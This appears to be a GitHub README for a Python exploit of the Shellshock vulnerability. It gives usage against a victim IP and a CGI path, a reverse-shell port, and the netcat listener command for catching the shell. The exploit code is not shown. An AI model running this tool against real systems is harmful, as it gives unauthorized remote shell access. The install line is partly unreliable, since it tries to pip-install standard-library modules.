Skip to content

8dcc/shellshock-python-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 

Repository files navigation

Shellshock python exploit

Python script for the shellshock vulnerability.

Installation

sudo apt install python-pip && pip install sys && pip install requests && pip install time

git clone https://github.com/r4v10l1/shellshock_python_exploit

cd shellshock_python_exploit

chmod +x shellshock.py

./shellshock.py

Usage

python shellshock.py Victim IP Vulnerable .cgi path Your IP Reverse Shell Port

It is important to leave a space between the victim's ip and the .cgi path.

Example: shellshock.py 192.168.1.X /here/your.cgi 127.0.0.1 4444

Listener command: nc -lvp port

Screenshot

alt text

About

Python script for the shellshock vulnerability.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages